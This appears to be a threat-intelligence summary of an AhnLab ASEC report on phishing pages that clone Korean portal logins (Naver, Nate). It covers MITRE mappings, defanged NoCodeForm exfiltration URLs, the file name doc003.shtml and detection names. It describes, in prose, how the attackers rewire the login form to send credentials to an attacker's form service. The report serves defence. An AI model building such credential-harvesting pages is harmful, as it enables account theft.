Keypoints
- ASEC identified phishing HTML files mimicking Korean portal login pages, including Naver and Nate.
- Threat actors used the actual source code of legitimate sites, altering form behavior to capture credentials.
- Email addresses were pre-filled in the ID input to increase user trust and likelihood of credential entry.
- Exfiltration was implemented via NoCodeForm service by changing the form’s onsubmit to an action targeting attacker-controlled form-ids.
- Collected credentials could be delivered to the attacker via NoCodeForm’s default form results or forwarded to email/Slack.
- Examples include a distributed file named “doc003.shtml” and AhnLab detections Phishing/HTML.FakeLogin.SC199025 and SC199026.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The attack used HTML attachments that impersonate legitimate login pages to capture credentials (‘the phishing HTML page distributed with the file name “doc003.shtml”‘)
- [T1566.002] Spearphishing Link – Personalized content increased effectiveness by pre-filling recipient emails in the login form (‘the ID of the phishing email recipient is already filled out’)
- [T1036] Masquerading – The adversary replicated legitimate site source code to make fake pages almost indistinguishable from the original (‘the threat actor using the actual source code of the normal website to modify the address and method for sending ID and password’)
- [T1567] Exfiltration Over Web Service – Credentials were redirected to NoCodeForm endpoints by modifying form handlers to use the service’s form-id as the action, enabling collection and forwarding via email/Slack (‘the threat actor changed the onsubmit event handler … utilized the NoCodeForm form-id as an address to deliver the exfiltrated account credentials.’)
Indicators of Compromise
- [URLs] Exfiltration endpoints used by attacker – hxxps://nocodeform[.]io/f/6612aaccf9a3a01ba8f6d979, hxxps://nocodeform[.]io/f/6605717e7bf0d35064f45348
- [File name] Phishing HTML file distributed as an email attachment – doc003.shtml
- [Detection names] AhnLab detections for these phishing pages – Phishing/HTML.FakeLogin.SC199025, Phishing/HTML.FakeLogin.SC199026
ASEC observed threat actors creating near-identical copies of Korean portal login pages (notably Naver and Nate) by copying the original HTML/CSS and modifying only the login form’s submission logic. The email recipient’s address was programmatically injected into the ID input field, increasing the page’s perceived legitimacy and encouraging victims to enter their passwords.
Technically, the actors replaced the page’s normal onsubmit handler with an action URL pointing to a NoCodeForm form-id, so submitted credentials are POSTed to NoCodeForm endpoints under attacker control. NoCodeForm then delivers collected form results via the service’s default mechanism or forwards them to attacker-specified email or Slack destinations, enabling straightforward credential exfiltration without hosting a custom backend.
Indicators include the distributed HTML file (doc003.shtml), the NoCodeForm URLs listed above, and AhnLab detection names Phishing/HTML.FakeLogin.SC199025 and SC199026. Mitigations include avoiding logins via email attachments, validating URLs before entering credentials, and rotating passwords immediately if a suspect login occurred.
Read more: https://asec.ahnlab.com/en/64294/